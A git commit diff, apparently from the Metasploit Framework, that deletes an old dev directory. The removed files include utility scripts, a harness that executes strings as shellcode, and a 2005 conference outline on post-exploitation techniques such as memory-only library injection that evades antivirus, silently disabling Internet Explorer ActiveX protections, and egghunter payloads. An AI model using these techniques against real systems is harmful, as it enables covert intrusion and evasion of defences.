Nuke the old/obsolete dev directory
git-svn-id: file:///home/svn/framework3/trunk@5960 4d416f70-5f16-0410-b530-b9f4589650da
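--- a/PATH_NOT_SHOWN_01
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env ruby
-
-banner =
-%q{##
-# $Id:$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/projects/Framework/
-##
-
-}
-
-mod = ARGV.shift
-data = File.read(mod)
-
-if (data =~ /This file is part of the Metasploit/) {
-exit(0)
-}
-
-
-fd = File.open(mod, 'w')
-fd.write(banner)
-fd.write(data)
-fd.close
-
-system("svn propset svn:keywords 'Rev Revision Id Header' #{mod}")
-
-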
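--- a/PATH_NOT_SHOWN_02
+++ /dev/null
@@ -1,39 +0,0 @@
-#/usr/bin/perl
-use strict;
-
-die if @ARGV != 1;
-
-move($ARGV[0]);
-
-sub old_to_new {
-my $name = shift;
-
-$name =~ s/^([A-Z])/lc($1)/ge;
-$name =~ s/([A-Z])/"_" . lc($1)/ge;
-
-return($name);
-}
-
-sub move {
-my $dir = shift;
-my @entries;
-
-opendir(DIR, $dir) || die "Can't open $dir: $!\n";
-@entries = readdir(DIR);
-closedir(DIR);
-
-foreach my $entry (@entries) {
-next if($entry eq 'Attic' || $entry =~ /^\./);
-
-my $path = $dir . '/' . $entry;
-my $newpath = $dir . '/' . old_to_new($entry);
-
-if(-d $path) {
-move($path);
-}
-
-print "$path -> $newpath\n";
-rename($path, $newpath) || die("BAH!");
-
-}
-}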
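--- a/PATH_NOT_SHOWN_03
+++ /dev/null
@@ -1,27 +0,0 @@
-#!/usr/bin/perl -pi
-use strict;
-
-s/require '(.*?)'/"require '" . waka($1) . "'"/ge;
-
-sub waka {
-my $required = shift;
-
-my @pieces = split('/', $required);
-map { $_ = old_to_new($_) } @pieces;
-my $new = join('/', @pieces);
-
-return $new;
-}
-
-sub old_to_new {
-my $name = shift;
-
-if(uc($name) eq $name) {
-return(lc($name));
-}
-
-$name =~ s/^([A-Z])/lc($1)/ge;
-$name =~ s/([A-Z])/"_" . lc($1)/ge;
-
-return($name);
-}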
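--- a/PATH_NOT_SHOWN_04
+++ /dev/null
@@ -1,48 +0,0 @@
-Auxiliary Module Design
------------------------
-
-The goal of this document is to define the requirements and basic
-implementation of Metasploit v3.0 Auxiliary Modules. Auxiliary modules have a
-unique role in the Framework in that they can do just about anything.
-Auxiliary modules work similar to exploits, in that the user selects a module,
-configures, and launches it, but differs in that they do not execute arbitrary
-code on target systems.
-
-
-Design Goals
-------------
-
-Auxiliary modules should be capable of performing reconnaisance activities,
-such as sending probes or listening to the network, and exporting the data
-into a persistent storage system accessible to the rest of the Framework. Not
-all auxiliary modules produce this type of data, some may perform intrusive
-actions, such as file retrieval or modifying access credentials.
-
-An Auxiliary module has the ability to define new commands and then process
-these commands. Any user interface that sypports Auxiliary modules needs to
-take into account this fact and allow these optional commands to be accessed.
-
-Unlike exploits, auxiliary modules do not use Targets, instead they support
-what we call Actions. An Action is an option, that when set, causes the
-auxiliary module to perform a selected task. Between the extensible command
-set and the Actions system, a single auxiliary module is capable performing an
-almost infinite number of tasks.
-
-An example would be a module that performs various tasks against a Microsoft
-SQL Server. This module would only support the default command of 'run', but
-could allow the user to send a UDP probe and display the data, perform an
-account brute force, or scan all open ports for an exposed MSSQL DCERPC
-interface.
-
-
-
-
-
-Storage
--------
-
-
-
-
-Requirements
-------------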
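--- a/PATH_NOT_SHOWN_05
+++ /dev/null
@@ -1,75 +0,0 @@
-From nolimit.bugtraq@gmail.com Sun Jan 22 16:40:09 2006
-From nolimit.bugtraq@gmail.com Sun Jan 22 22:39:35 2006
-Return-Path: <nolimit.bugtraq@gmail.com>
-X-Spam-Checker-Version: SpamAssassin 3.1.0-gr0 (2005-09-13) on sugar.14x.net
-X-Spam-Level:
-X-Spam-Status: No, score=-2.1 required=5.0 tests=BAYES_00,HTML_40_50,
-HTML_MESSAGE autolearn=ham version=3.1.0-gr0
-Delivered-To: hdm-hdm@metasploit.com
-Received: (qmail 8349 invoked from network); 22 Jan 2006 16:39:35 -0600
-Received: from unknown (HELO uproxy.gmail.com) (66.249.92.203)
-by sugar.14x.net with SMTP; 22 Jan 2006 16:39:35 -0600
-Received: by uproxy.gmail.com with SMTP id j3so504335ugf
-for <hdm@metasploit.com>; Sun, 22 Jan 2006 14:40:09 -0800 (PST)
-DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
-s=beta; d=gmail.com;
-h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
-b=FBG7YV3XXWeZisoQR5v8dxhWbwA/m0bXqv9oL5+jChFGrjP4k1cR2k8HdCygCpy1yJQoMLwlbPNVtdUkYMAoFg+fTTRDbZiiM8XQtidhcaM41Hbep60wkSBX8UemqRSLFaX0fRqiNDkHrAyEkVZOedxEwEzy+YYDFeqEiGVWib8=
-Received: by 10.66.219.19 with SMTP id r19mr1989749ugg;
-Sun, 22 Jan 2006 14:40:09 -0800 (PST)
-Received: by 10.66.255.7 with HTTP; Sun, 22 Jan 2006 14:40:08 -0800 (PST)
-Message-ID: <786b40bf0601221440x27049938h4c4fd527c23b930c@mail.gmail.com>
-Date: Sun, 22 Jan 2006 17:40:09 -0500
-From: nolimit bugtraq <nolimit.bugtraq@gmail.com>
-To: H D Moore <hdm@metasploit.com>
-Subject: Re: Metasploit Framework License
-In-Reply-To: <200601221520.34147.hdm@metasploit.com>
-MIME-Version: 1.0
-Content-Type: multipart/alternative;
-boundary="----=_Part_10104_11843058.1137969609003"
-References: <200601221520.34147.hdm@metasploit.com>
-Status: R
-X-Status: NC
-X-KMail-EncryptionState:
-X-KMail-SignatureState:
-X-KMail-MDN-Sent:
-
-------=_Part_10104_11843058.1137969609003
-Content-Type: text/plain; charset=ISO-8859-1
-Content-Transfer-Encoding: quoted-printable
-Content-Disposition: inline
-
-I give you full rights to use any exploits I've published in the metasploit
-framework, and continue to be honored by it.
-
-On 1/22/06, H D Moore <hdm@metasploit.com> wrote:
->
-> Hello,
->
-> I you are receiving this email, there is a good chance that you
-> contributed to the Metasploit Framework sometime in the past.
-> Starting with version 3.0, we are changing the licensing terms.
-> <CUT>
->
-
-------=_Part_10104_11843058.1137969609003
-Content-Type: text/html; charset=ISO-8859-1
-Content-Transfer-Encoding: quoted-printable
-Content-Disposition: inline
-
-I give you full rights to use any exploits I've published in the metasploit=
-framework, and continue to be honored by it. <br><br>
-<div><span class=3D"gmail_quote">On 1/22/06, <b class=3D"gmail_sendername">=
-H D Moore</b> <<a href=3D"mailto:hdm@metasploit.com">hdm@metasploit.com<=
-/a>> wrote:</span>
-<blockquote class=3D"gmail_quote" style=3D"PADDING-LEFT: 1ex; MARGIN: 0px 0=
-px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">Hello,<br><br>I you are receivin=
-g this email, there is a good chance that you<br>contributed to the Metaspl=
-oit Framework sometime in the past.
-<br>Starting with version 3.0, we are changing the licensing terms.<br><=
-CUT><br></blockquote></div>
-
-------=_Part_10104_11843058.1137969609003--
-
-
-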
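--- a/PATH_NOT_SHOWN_06
+++ /dev/null
@@ -1,55 +0,0 @@
-#!/usr/local/bin/ruby
-
-if ARGV.empty?
-puts "usage: <delta value | t> <files ...>"
-exit(1)
-end
-
-textmode = false
-
-if ARGV[0] == 't'
-ARGV.shift
-textmode = true
-else
-delta = ARGV.shift.to_i
-end
-
-first = TRUE
-last = [ ]
-
-# simple algorithm, build up a list of all the possible addresses
-# calculating the delta range for each address in the file... then
-# just do a set intersection across these all and you have your results
-
-ARGV.each do |file|
-cur = [ ]
-IO.foreach(file) do |line|
-if textmode
-cur << line
-else
-addr = line.hex
-(-delta .. delta).each do |d|
-cur << addr + d
-end
-end
-end
-
-if first
-first = FALSE
-last = cur
-else
-last = last & cur
-end
-
-end
-
-# print da results
-
-last.each { |l|
-if textmode
-puts l
-else
-puts "0x%08x" % l
-end
-}
-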
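--- a/PATH_NOT_SHOWN_07
+++ /dev/null
@@ -1,2 +0,0 @@
-load db_postgres
-exit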
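--- a/PATH_NOT_SHOWN_08
+++ /dev/null
@@ -1,7 +0,0 @@
-load db_sqlite3
-db_create
-db_import_nessus_nbe /home/hdm/local.nbe
-db_hosts
-db_vulns
-db_destroy
-db_hosts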
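--- a/PATH_NOT_SHOWN_09
+++ /dev/null
@@ -1,19 +0,0 @@
-load db_sqlite3
-use aux/recon
-set RHOST 127.0.0.1
-set ACTION Probe All Ports
-run
-sleep 1
-db_services
-sleep 1
-db_services
-sleep 1
-db_services
-sleep 1
-db_services
-sleep 1
-db_services
-sleep 1
-db_services
-sleep 1
-db_services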
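--- a/PATH_NOT_SHOWN_10
+++ /dev/null
@@ -1,11 +0,0 @@
-OPTS="-x .ut.rb -x .ts.rb -q"
-BASE="documentation/api"
-
-echo "Generating rex..."
-rdoc $OPTS -t "Rex Documentation" -o $BASE/rex lib/rex
-echo "Generating msfcore"
-rdoc $OPTS -t "Framework Core Documentation" -o $BASE/msfcore lib/msf/core
-echo "Generating msfbase"
-rdoc $OPTS -t "Framework Base Documentation" -o $BASE/msfbase lib/msf/base
-echo "Generating msfui"
-rdoc $OPTS -t "Framework UI Documentation" -o $BASE/msfui lib/msf/ui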
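--- a/PATH_NOT_SHOWN_11
+++ /dev/null
@@ -1,2 +0,0 @@
-require 'mkmf'
-create_makefile('machinetestinternal')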
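--- a/PATH_NOT_SHOWN_12
+++ /dev/null
@@ -1,12 +0,0 @@
-#!/usr/bin/env ruby
-
-require 'machinetestinternal'
-
-module MachineTest
-def MachineTest.test(str, all = false)
-MachineTest::Internal.test(str + "\xcc", all)
-end
-def MachineTest.testraw(str, all = false)
-MachineTest::Internal.test(str, all)
-end
-end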
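--- a/PATH_NOT_SHOWN_13
+++ /dev/null
@@ -1,67 +0,0 @@
-#include <stdio.h>
-#include <unistd.h>
-#include <sys/wait.h>
-#include <sys/mman.h>
-#include <errno.h>
-
-#include <ruby.h>
-#include <signal.h>
-#define PAGE_SIZE 0x1000
-
-static VALUE t_test(VALUE self, VALUE str, VALUE all) {
-int len = 1, pid, status, i;
-char *ptr, *start, *stop;
-
-str = StringValue(str);
-
-/* test all of the string, instead of just from the beginning */
-if(all == Qtrue)
-len = RSTRING(str)->len;
-
-while(len-- > 0) {
-switch(fork()) {
-case -1:
-perror("fork");
-rb_raise(rb_eRuntimeError, "fork failed!");
-case 0:
-for(i = 0; i < 20; i++) {
-signal(i, SIG_DFL);
-}
-
-ptr = RSTRING(str)->ptr + len;
-
-start = (char *)((unsigned int)ptr & ~(PAGE_SIZE-1));
-stop = (char *)(((unsigned int)(ptr + (RSTRING(str)->len - len)) + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1));
-
-__asm__ __volatile__(
-"mov %0, %%eax"
-:
-: "m"((long)ptr)
-: "%eax");
-
-if ((i = mprotect(start, (int)(stop - start), PROT_EXEC|PROT_WRITE|PROT_READ)) != 0)
-printf("mprotect failed, %d %d\n", i, errno);
-
-((void (*)(void)) RSTRING(str)->ptr + len)();
-exit(1);
-default:
-wait(&status);
-if(!WIFSIGNALED(status) || WTERMSIG(status) != 5) {
-return INT2NUM(len);
-}
-break;
-}
-}
-
-return Qnil;
-}
-
-void Init_machinetestinternal() {
-VALUE cTest;
-
-cTest = rb_define_module_under(
-rb_define_module("MachineTest"),
-"Internal"
-);
-rb_define_module_function(cTest, "test", t_test, 2);
-}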
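--- a/PATH_NOT_SHOWN_14
+++ /dev/null
@@ -1,33 +0,0 @@
-
-Blog entry, Stardate April, 2005
-
-We have recently been on a new shellcode kick, but this time it's not about
-making them smaller. We're currently working on building very power new
-post-exploitation shellcode and toolkits, and a very powerful unified API
-to expose their functionality. This will allow us to diverge from precanned
-payloads, allowing users to quickly build power and portable post-exploitation
-tools. We've have built strongly upon our Windows DLL injection, and are
-working on extending similar functionality to the land of Unix. We're also
-working hard on the next version of Metasploit, which follows this same
-philosophy of emedability and extensablity, allowing users to build their own
-tools on top of our framework. Our previous work was all about exploit
-frameworks. Our new approach we are really building more of a hacker tool
-framework, allowing very strong automation and customization.
-
-
-
-ignore this.....
-
-With Metasploit 3.0 on the horizon, we've been working hard on design and
-building components to take a very different focus. Currently Metasploit 2
-is very much an end user tool, and doing anything custom isn't so elegant.
-The approach we are taking in Metasploit 3, is "Metasploit as a library". We
-are working very hard on writing post-exploitation suites for different
-platforms, and then building a unified API that they all adhere to. This will
-allow you to directly script remote hosts, proxying file operations, network
-communications, and transparent channelized communication. The new system is
-being designed to be threadsafe to a high degree, forcing us to rethink and
-redesign many of our tools and protocols. Our new system is design to allow
-you to do things like run 10 exploits concurrently, all "pivoting" through
-a host you previously owned. Along with this new feature set, we are still
-concentrating on keeping things off disk, all in-memory injection, etc.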
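--- a/PATH_NOT_SHOWN_15
+++ /dev/null
@@ -1,383 +0,0 @@
-[12:52:34] -> *spewnum* damn you! :) fine, we'll just call them payloads, and then we'll break it up as Payload Stagers, Payload Stages, and
-Post-exploitation suites, does that sound coo?
-
-I. Introduction
-A. Who are we?
-1. spoonm
-2. skape
-3. Why do we do this hoodoo voodoo
-B. Exploit Technology
-1. Three Phases of Exploitation
-a. Pre-exploitation
-b. Exploitation
-c. Post-exploitation
-2. Pre-exploitation - Before the attack
-a. Find the bug
-b. Write exploits, payloads, tools
-3. Exploitation - Leveraging the vulnerability
-a. Find a target
-c. Gather info, setup tools, prepare listeners, etc
-b. Launch attack
-4. Post-Exploitation - Manipulating the target
-a. Command shell redirection
-b. Arbitrary command execution
-c. Pivoting payloads
-d. Advanced payload interaction
-B. Where do we stand?
-1. Pre-exploitation
-a. Robust and elegant encoders do exist
-i. SkyLined's alpha-numeric encoder
-ii. Spoonm's Shikata Ga Nai
-b. Payload encoders generally taken for granted
-NOTE: maybe expand a little bit more here...
-i. Most encoders are static with a variable key
-ii. IDS able to signature static decoder stubs
-c. NOP generation hasn't publically changed much
-i. PoC exploits generally use predictable nops, if any
-ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
-iii. Not considered very important to many researchers
-d. NIDS deployments are playing chase the tail
-i. The mouse always has the advantage; NIDS is reactive
-ii. Advanced nops and encoders push NIDS to its limits
-NOTE: maybe talk about how complex some things are to signature,
-for example, RPC, application level fragmentation, etc.
-2. Exploitation
-a. Techniques have become very mature
-i. Linux/BSD exploitation techniques largely unchanged
-ii. Win32 heap overflows now more reliable (oded/shok)
-iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
-b. Exploitation topics have been beaten to death
-3. Post-exploitation
-a. Common payloads are limited
-i. Command shell interaction has poor automation support
-ii. Limited to the command set that the interpreter provides
-iii. Bounded by the utilities installed on the target machine
-iv. Restrictive environments (chroot) can hinder command execution
-v. HIPS vendors becoming more adept at detecting basic payloads
-- LoadLibraryA from the stack, etc (mcafee 8.0i)
-NOTE: I think it would be important here to talk even about the
-issues with "advantage" payloads, ala Core Impact and CANVAS.
-We should look into them more, but I have a hunch that they
-aren't that well writte, don't have that great of APIs
-exposed, and aren't very extensible for a 3rd party not
-on the team authoring the product. Even the "advanced" stuff
-I think has a lot of issues.
-b. Communication vectors largely unchanged
-i. Reverse and port-bind payloads still the most common
-ii. Findsock style payloads still unused by PoC exploits
-iii. Alternative communication vectors rarely discussed
-c. Pivoting technology exists
-i. Core ST described system call proxying in 2002
-ii. Metasploit's (2.3) meterpreter provides basic network pivoting
-C. What will we discuss?
-1. Pre-exploitation Research
-a. NOP generation
-i. Opty2
-b. Encoders
-i. Additive feedback encoders
-ii. Shikata Ga Nai
-2. Post-Exploitation Research
-a. Library Injection
-i. Facilitates things like Meterpreter and VNC injection
-b. VNC Injection
-i. Introduced at blackhat04 with the Metasploit 2.2 release
-c. Meterpreter & dN
-i. The cross-platform post-exploitation suite
-NOTE: dN is weak, but maybe talk about it from a different perspective,
-just about allowing the attacker to really orcistrate everything
-down even to the system call level. Definitely should talk a
-bunch about your ninjaness with meterp TLV stylies, and the
-channelized throwdown. (</thuggin>).
-3. Payload Research
-a. PassiveX
-i. Taking advantage of ActiveX controls
-ii. Taking advantage of soccer playing sisters.
-b. Ordinal Stagers
-i. Tiny network capable stagers
-c. Egghunt (maybe?)
-i. Small payload capable of locating a larger payload
-ii. Useful for exploits with limited space
-NOTE: Egghunt is cool, and we can just talk a bit about how we
-extracted the syscalls, and how all of our tools come together
-to do stuff like that really fast/easily. Oded mentioned he
-saw the page and thought it was cool, he wondered how you
-got the prototypes...
-II. Pre-exploitation
-A. OptyNop2
-1. Creation and benefits of multi-byte nopsleds
-B. Additive feedback encoders
-C. Shikata Ga Nai
-1. High permutation shellcode through simple dependency mappings
-III. Post-exploitation
-A. Library Injection
-1. Overview
-a. Paper published in 04/2004
-b. Provides advanced code execution
-c. Code can be written in any language that can compile down
-to a shared object.
-d. Allows developer to use all of the APIs exposed to a normal
-application.
-e. Detailed explanation can be found in included resources
-(include lib inject paper)
-2. Two types of library injection
-a. On-Disk
-i. Library is loaded from the target's harddrive or via a
-file share.
-ii. Can be detected by AV products due to fs access
-b. In-Memory
-i. Library is uploaded to the target and loaded from memory
-without touching the disk
-ii. Evades file system filter drivers, such as those
-provided by AV companies
-iii. Not touching the disk means no forensic trace
-iv. VirtualLock prevents swapping to disk, but requires admin
-3. In-memory library injection on Windows
-a. System calls used by the library loader are hooked
-i. NtCreateFile
-ii. NtMapViewOfSection
-iii. etc
-b. Unique image name is used to identify the image to image that
-is in memory
-c. System call hooks are removed so that future injectino can
-occur
-d. Alternative approaches
-i. Could do client-side relocations, but would need to handle
-import processing
-4. In-memory library injection on Linux/BSD
-a. No known public implementations
-b. Requires alternate approach
-i. Hooking API routines not always possible -- symtab not
-mapped into memory
-ii. libc symbol version mismatches lead to linking nightmares
-c. Client-side relocations seem most feasible
-i. Remote side maps a region of memory and sends the client
-the base address
-ii. Client processes relocations and transmits the relocated
-image as its mapped segment would appear
-iii. Requires locating rtld base so that PLT lookups will
-work
-B. VNC Injection
-1. Implements VNC as an injectable DLL
-a. Uses RealVNC as the code-base
-b. VNC communication uses the exploit connection
-c. No physical trace is left of the VNC server
-d. Can operate regardless of existing VNC installations
-2. Easy way to illustrate insecurities
-a. Suits understand mouse movement better than black box command
-prompts
-C. Meterpreter
-1. Generic post-exploitation suite
-a. Based on library injection
-b. Uses the established exploit connection
-i. Especially powerful with findsock payloads; no new connection
-c. Executes entirely from memory
-d. No new processes or file access required for the payload to
-succeed
-e. Detailed explanation can be found in included resources
-(include meterpreter paper)
-2. Extension system provides advanced automation support
-a. No need to hand write tedious assembly
-b. Existing native code can be ported to a meterpreter extension
-3. Architecture
-a. Design goals
-i. Very flexible protocol; should adapt to extension requirements
-ii. Exposure of a channelized communication system to extensions
-iii. Stealth operation
-iv. Should be portable to various operating systems
-v. Client from one platform should work with server on another
-platform
-b. Protocol
-i. Uses TLVs (Type-Length-Value) to support arbitrary data
-passing.
-ii. TLVs allow the packet parser to be oblivious to the structure
-of the value field
-iii. Type field is broken down into meta types
-4. Core interface
-a. Overview
-i. Minimal interface to support the loading of extensions
-ii. Implements the basic packet transmission and dispatching
-facilities
-iii. Exposes channel allocation and management to extensions
-b. Advanced features
-i. Migrating the server instance between processes
-5. The ``stdapi'' extension
-a. Overview
-i. Included in Metasploit 3.0
-ii. Provides access to some of the common subsystems of the
-target operating system
-iii. Allows for easy automation and implementation of robust
-post-exploitation scripts
-b. File System
-i. File and directory interaction
-ii. Files can be uploaded and downloaded between the
-attacker and the target
-c. Network
-i. Transparent network pivoting
-ii. Route table enumeration and manipulation
-iii. Local interface enumeration
-d. Process
-i. Process execution, optionally with channelized IO
-ii. Enumeration of running processes
-iii. Modification of arbitrary memory
-iv. Creation and modification of running threads
-v. Loading and interacting with shared object files
-e. Registry
-i. General registry API access
-ii. Opening, creating, and removing registry keys
-iii. Setting, querying, and deleting registry values
-iv. Enumeration of both keys and values
-f. User interface
-i. Disabling local user interaction via the keyboard
-and/or mouse (similar to VNC)
-ii. Idle timeout checking to see how long it's been
-since the user did something interactive
-6. The ``priv'' extension
-a. Still in development
-b. Exposes an interface to escalating local privileges
-through local vulnerabilities
-c. SAM dumping support similar to pwdump3
-D. dN
-1. Simple low-footprint post-exploitation tool
-2. Useful to scope out execution enviroment, then bootstrap other tools
-IV. Payload Research
-A. PassiveX
-1. Overview
-a. Post-exploitation payload
-b. A derivative of On-Disk library injection that uses
-ActiveX controls
-c. Supports arbitrary DLL injection in any language that can
-be compiled as an ActiveX control (C++, VB, etc)
-d. Detailed analysis can be found in included resources
-(include passivex paper)
-2. Payload Implementation
-a. Disables iexplore Internet zone restrictions on
-ActiveX controls
-i. Modifies four registry values that are stored per-user
-b. Launches a hidden iexplore at a URL with an embedded
-OCX
-i. The OCX does not have to be signed
-ii. No user interaction is required
-iii. OCX is automatically downloaded, registered, and loaded
-into the browser's context
-3. Sample HTTP tunneling ActiveX control
-a. HTTP GET/POST used to build tunnel to attacker
-i. Uses the WININET API
-ii. Outbound traffic from target machine encapsulated in POST
-request
-iii. Inbound traffic from attacker encapsulated in GET response
-iv. Proxy configuration automatically inherited
-v. Requires HTTP server capable of performing encap/decap on the
-HTTP packets
-b. Streaming connection through HTTP tunnel can be created
-i. socketpair doesn't exist natively on win32 but can be simulated
-with a local listener
-ii. Streaming abstraction allows advanced payloads to transparently
-use the HTTP transport (Meterpreter, VNC)
-iii. Local listener less covert, but highly beneficial
-4. Pros
-a. Bypasses restrictive outbound filters
-b. Re-uses proxy configuration
-c. Looks like normal user traffic
-d. Allows full access to the win32 API like all forms of
-library injection
-5. Cons
-a. Touches the disk
-b. Requires administrative access
-i. Internet Explorer prohibits the downloading of
-ActiveX controls as non-admin
-B. Windows Ordinal Stagers
-1. Overview
-a. Technique from Oded's lightning talk from core04
-b. Uses static ordinals to locate winsock symbol addresses
-c. Compatible with all versions of Windows
-d. 92 byte reverse stager, 93 byte findsock stager
-e. Detailed explanation can be found in included resources
-(include spoonm ordinal paper)
-2. Reverse Ordinal Stager
-a. Walks InitOrderModuleList searching for ws2_32
-b. Uses static ordinals to index the export table
-c. Creates fd with socket
-d. Chains connect and recv frames
-e. Returns into buffer read in from file descriptor
-C. Egghunting
-1. Overview
-a. Small stub payload that can search for a larger payload
-b. Useful for exploits that have limited payload space but can
-stash more payload elsewhere in memory
-c. Example exploits include the IE object type vulnerability.
-d. Goal is to safely search target address space for the larger
-payload.
-e. Larger payload is located by searching for an egg that is prepended
-to it.
-f. Detailed analysis can be found in included resources
-(include egghunt paper)
-2. Two primary methods of egghunting on Windows
-a. SEH
-1. 60 bytes in size, searches for an 8 byte egg, compatible with all
-versions of Windows (including 9x)
-2. Installs a custom exception handler
-3. Begins walking the address space
-i. When a bad address is encounter, the current pointer is
-incremented by PAGE_SIZE
-ii. When a mismatch of the egg is encountered, the current pointer
-is incremented by one
-4. Each address is compared against the 8-byte egg
-i. Bad addresses will throw exceptions which will be handled
-by the custom exception handler
-5. When the egg is found, jump past the egg into the larger payload
-b. System call
-1. Very small stub (32 bytes), searches for an 8 byte egg, only
-compatible with NT+
-2. Uses a non-intrusive system call (NtDisplayString) to search validate
-addresses
-i. Same page walking logic as SEH is used
-3. When the egg is found, jump past the egg into the larger payload
-3. One primary method of egghunting on Linux
-a. System call
-1. 30 bytes in size, searches for an 8 byte egg
-2. System call technique applies to other UNIX variants as well
-3. Uses the sigaction system call to validate 16 bytes at once
-4. Pros
-i. Very small
-5. Cons
-i. Corner cases may cause it to be unstable
-V. The Complete Picture - Metasploit 3.0
-A. The power of pre-exploitation prepartion
-1. Abstract NOP generation
-2. Abstract payload encoding
-3. Abstract exploit connection handlers
-i. Bind handler
-ii. Reverse handler
-iii. Findsock handler
-B. The power of exploit generalization
-1. Standardized exploit creation interface
-i. Robust target definitions
-ii. Detailed exploit implementation information
-iii. Entirely payload independent, no hardcoding paylaods
-C. The power of post-exploitation automation
-1. Complicated tasks made simple with scripting
-i. Want to download a targets entire harddrive?
-ii. Want to disable local user interaction?
-iii. Want to upload and play an mp3 on the target?
-iv. Want to 'be' on the target's network?
-2. Standard interface means cross platform support
-VI. Conclusion - where do we go from here?
-A. Future Post-exploitation research
-1. Mesh network support
-2. Expansion of the stdapi described in this document
-
-included resources:
-http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
-http://www.hick.org/code/skape/papers/meterpreter.pdf
-http://www.hick.org/code/skape/papers/remote-library-injection.pdf
-http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
-http://www.metasploit.com/users/spoonm/ordinals.txt
-
-cited material:
-STRIDE:
-http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
-
-syscall proxy:
-http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
-
-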
@ -1,378 +0,0 @@
|
|||
04/19/2005
|
||||
|
||||
Note:
|
||||
|
||||
We've tried to include most of the topics that will be covered in our
|
||||
presentation. However, many of these things will be discussed, but will not be
|
||||
our main concentration. The majority of our presentation will be around topic
|
||||
V. C, our new post-exploitation advances, and how they will be designed and
|
||||
integrated into Metasploit 3. Metasploit 3 won't be finished in time for
|
||||
Blackhat, but more important than the software itself is the work we've done
|
||||
on developing the individual components that it will be built from.
|
||||
|
||||
This outline is pretty indepth, so it's hard to pick out all the nuggets of
|
||||
coolness. We've developed many really useful technologies in the area of
|
||||
payload development. These are things we've created since last year's
|
||||
Blackhat, including many advances in polymorphic shellcode, and
|
||||
high-permutation attacks.
|
||||
|
||||
I. Introduction
|
||||
A. Who are we?
|
||||
1. spoonm
|
||||
2. skape
|
||||
B. Exploit Technology
|
||||
1. Three Phases of Exploitation
|
||||
a. Pre-exploitation
|
||||
b. Exploitation
|
||||
c. Post-exploitation
|
||||
2. Pre-exploitation - Preparing the payload
|
||||
a. NOP generation
|
||||
b. Payload encoders
|
||||
c. Connection handler initialization
|
||||
3. Exploitation - Leveraging the vulnerability
|
||||
a. Stack overflows
|
||||
c. Heap overflows
|
||||
b. SEH overwrites
|
||||
d. Arbitrary pointer overwrites
|
||||
4. Post-Exploitation - Manipulating the target
|
||||
a. Command shell redirection
|
||||
b. Arbitrary command execution
|
||||
c. Pivoting payloads
|
||||
d. Advanced payload interaction
|
||||
B. Where do we stand?
|
||||
1. Pre-exploitation
|
||||
a. Robust and elegant encoders do exist
|
||||
i. SkyLined's alpha-numeric encoder
|
||||
ii. Spoonm's Shikata Ga Nai
|
||||
b. Payload encoders generally taken for granted
|
||||
i. Most encoders are static with a variable key
|
||||
ii. IDS able to signature static decoder stubs
|
||||
c. NOP generation hasn't publically changed much
|
||||
i. PoC exploits generally use predictable nops, if any
|
||||
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
|
||||
iii. Not considered very important to many researchers
|
||||
d. NIDS deployments are playing chase the tail
|
||||
i. The mouse always has the advantage; NIDS is reactive
|
||||
ii. Advanced nops and encoders push NIDS to its limits
|
||||
2. Exploitation
|
||||
a. Techniques have become very mature
|
||||
i. Linux/BSD exploitation techniques largely unchanged
|
||||
ii. Win32 heap overflows now more reliable (oded/shok)
|
||||
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
|
||||
b. Exploitation topics have been beaten to death
|
||||
3. Post-exploitation
|
||||
a. Common payloads are limited
|
||||
i. Command shell interaction has poor automation support
|
||||
ii. Limited to the command set that the interpreter provides
|
||||
iii. Bounded by the utilities installed on the target machine
|
||||
iv. Restrictive environments (chroot) can hinder command execution
|
||||
v. HIPS vendors becoming more adept at detecting basic payloads
|
||||
- LoadLibraryA from the stack, etc (mcafee 8.0i)
|
||||
b. Communication vectors largely unchanged
|
||||
i. Reverse and port-bind payloads still the most common
|
||||
ii. Findsock style payloads still unused by PoC exploits
|
||||
iii. Alternative communication vectors rarely discussed
|
||||
c. Pivoting technology exists
|
||||
i. Core ST described system call proxying in 2002
|
||||
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
|
||||
C. What will we discuss?
|
||||
1. Pre-exploitation Research
|
||||
a. NOP generation
|
||||
i. Opty2
|
||||
b. Encoders
|
||||
i. Additive feedback encoders
|
||||
ii. Shikata Ga Nai
|
||||
2. Post-Exploitation Research
|
||||
a. Library Injection
|
||||
i. Facilitates things like Meterpreter and VNC injection
|
||||
b. VNC Injection
|
||||
i. Introduced at blackhat04 with the Metasploit 2.2 release
|
||||
c. Meterpreter & dN
|
||||
i. The cross-platform post-exploitation suite
|
||||
3. Payload Research
|
||||
a. PassiveX
|
||||
i. Taking advantage of ActiveX controls
|
||||
b. Ordinal Stagers
|
||||
i. Tiny network capable stagers
|
||||
c. Egghunt (maybe?)
|
||||
i. Small payload capable of locating a larger payload
|
||||
ii. Useful for exploits with limited space
|
||||
II. Pre-exploitation
|
||||
A. OptyNop2
|
||||
1. Creation and benefits of multi-byte nopsleds
|
||||
B. Additive feedback encoders
|
||||
C. Shikata Ga Nai
|
||||
1. High permutation shellcode through simple dependency mappings
|
||||
III. Post-exploitation
|
||||
A. Library Injection
|
||||
1. Overview
|
||||
a. Paper published in 04/2004
|
||||
b. Provides advanced code execution
|
||||
c. Code can be written in any language that can compile down
|
||||
to a shared object.
|
||||
d. Allows developer to use all of the APIs exposed to a normal
|
||||
application.
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include lib inject paper)
|
||||
2. Two types of library injection
|
||||
a. On-Disk
|
||||
i. Library is loaded from the target's harddrive or via a
|
||||
file share.
|
||||
ii. Can be detected by AV products due to fs access
|
||||
b. In-Memory
|
||||
i. Library is uploaded to the target and loaded from memory
|
||||
without touching the disk
|
||||
ii. Evades file system filter drivers, such as those
|
||||
provided by AV companies
|
||||
iii. Not touching the disk means no forensic trace
|
||||
iv. VirtualLock prevents swapping to disk, but requires admin
|
||||
3. In-memory library injection on Windows
|
||||
